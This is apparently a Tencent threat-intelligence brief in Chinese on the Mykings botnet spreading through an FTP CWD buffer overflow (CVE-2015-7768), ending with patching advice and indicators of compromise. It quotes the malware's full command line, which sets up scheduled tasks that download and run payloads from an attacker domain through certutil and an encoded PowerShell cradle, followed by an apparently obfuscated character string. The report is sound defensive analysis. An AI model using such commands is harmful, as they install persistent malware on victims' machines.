Mykings僵尸网络最新活动简报

2018-11-30 22:00:55
近期,腾讯安全御见威胁情报中心再次监测到Mykings僵尸网络有了新的变化,开始使用FTP漏洞开始进行传播,感染了诸多学校和企业。本次感染依然使用极其复杂的加密和混淆的ps1脚本进行,而且同样无PE文件落地。这也大大增强了免杀能力和安全软件检测的难度。从C&C域名的检测情况来看,该变种的活跃始于11月初,而近期迎来了一波高峰。

一、概述

Mykings是著名的僵尸网络,该僵尸网络自2017年出现后,至今仍非常活跃。国内外多家安全公司都对该僵尸网络做过披露,腾讯御见威胁情报中心最新一次披露为97号《MyKings僵尸网络最新变种突袭,攻击代码多次加密混淆,难以检测》。

近期,腾讯御见威胁情报中心再次监测到该僵尸网络有了新的变化,开始使用FTP漏洞开始进行传播,感染了诸多学校和企业。此外,部分版本还是依然使用之前的SMB协议进行传播,如永恒之蓝漏洞和SMBClient,该部分具体的分析参见之前的文章。

本次感染依然使用极其复杂的加密和混淆的ps1脚本进行,而且同样无PE文件落地。这也大大增强了免杀能力和安全软件检测的难度。从C&C域名的检测情况来看,该变种的活跃始于11月初,而近期迎来了一波高峰:


二、技术分析

传播样本跟之前的版本一样为高度混淆的ps1脚本:


经过多次去混淆后,样本展开如下:


样本会将内置的编码压缩过的PE文件解码压缩后加载进内存中。

编码压缩过的PE


加载进内存:


随后调用内置函数ScanIPPort开启现成来扫描开放FTP服务的机器:


一旦发现有开放21端口(FTP)服务的机器就调用加载在内存中的PE文件的main函数,然后同时传入三个参数:IP21payload


内存调用的PE文件经过解码解压缩后发现是一个经过混淆的.net程序


经过混淆后:


PE主要作用是进一步组装payload,并且匿名登录FTP服务器,并发送payload。对其经过抓包分析发现,该payload发送的是一个超长的CWD命令:

经过进一步的分析发现,该payload为使用CVE-2015-7768漏洞进行攻击的存在该漏洞的FTP服务器。在代码上与公开的漏洞利用代码相似。

CVE-2015-7768Konica Minolta FTP Utility 1.0在解析CWD命令时,检查输入大小失败,在实现上存在缓冲区溢出漏洞,远程攻击者通过较长的CWD命令,利用此漏洞可执行任意代码:


我们对该payload进一步分析发现,该payload会执行一系列的cmd指令:


执行指令:

cmd.exe /c schtasks /create /scMINUTE /mo 55 /st 08:00:00 /tn CACHE /tr "cmd /c cd %temp%&certutil.exe -urlcache -split -f http://cache.abauit.com/cache.dat?vf_%COMPUTERNAME%p.dat&certUtil -f -decode p.datp.bat&p.bat&delp.dat p.bat&exit" /F&schtasks /create /sc MINUTE /mo 50 /st 07:05:00 /tn PerfTrack /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYwBkAG4ALgBhAGIAYQB1AGkAdAAuAGMAbwBtAC8AcAA/AGYAdgAnACkA"/F.Q6u32E2RbTRuSDayPlepFMcV5p6Mu4aue3ROQtSUwP2PtnQt3QD4epRPTnQrE1CD6FBPvNcRSQptuvpd1urLwPT06NCTe1rTQ0BPVNU2QqD4wVqu3He9sDTbEptoW6UvSCcSQxPtu1D3bKSCEpFOQst21upaadQuGPFOt3U3a0pM3y2nF5Rt0EGP4o2MpoGPp5DpgPVOSCT4Ep6PdwFZfP05ujvPDpwP6O2T0nq0V00eD20fcdsBcQqsPkQ0FO3DBRep4bpppobW2E3Bqcph0eRLrLupfMpnpoD0UpVMU5pp10U2qiT0pacCCCgPdmrEUpscPQbbg6aQBfSWQQBi71W1rO71SugDsqaJpQrbGCg13sDp712t1gcrSY2abgROsqRzf1SrSZRabh61sqbi2aW2bow177PUrapdraG1bUSqBfasBaQJf1aRpicqG5bmCqQrg1crt0QQw7aEbaE2Pgg24psq0C0k3qPL2G3rBK2aqW7HCqpdD7RbSEQQSwCGCqBBsG0BPhBaw7pQqQRCd7bbP0cqg8PISqe12q1R0ura2gPcaQbkBa71bNraPGu771qtCqaRvPsqqXQQraBou7Ba2V1QqSDx1Qf9CGRb2KaQ0GgDbarlE7rbcXra2gW9aQsirqW25a1QPGPkra3TSqBarUW1rg0M3qu23GG2CDw10C6XW10cQQ71FO2a2g69aQ1tBGQQPnSqQS2K3qfB5pFOsvS0AA

执行后,会发送本机的信息到作者服务器,然后执行感染脚本。

三、总结:

Mykings僵尸网络是近年来做活跃的僵尸网络之一,僵尸网络会继续传播挖矿木马,DDoS攻击,传播RAT盗取资料等。虽然从近期的检测来看并未有实质性的恶意动作,但是我们不排除该僵尸网络会随时爆发来进行恶意的攻击,切忌不可掉以轻心。此外,腾讯御见威胁情报中心还会继续持续不断的监控该僵尸网络,保护网民的安全。

四、安全建议

1、 及时打补丁,包括系统补丁和所用软件的补丁;

2、 关闭不必要的端口,方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html

3、 建议局域网用户切勿使用弱口令和统一口令;

4、 推荐企业用户使用御点终端安全管理系统保护电脑安全(下载地址:https://s.tencent.com/product/yd/index.html


五、IOCs

http://cache.abauit.com

http://p.abauit.com


参考资料

MyKings僵尸网络最新变种突袭,攻击代码多次加密混淆,难以检测

https://mp.weixin.qq.com/s/GJ4ilPNpe7NPevw4MHP0iw

MyKings僵尸网络的新动向:利用NSIS脚本挖门罗币

https://mp.weixin.qq.com/s/bgOLZIAcVw5ElN0Szc5Xyg



最新资讯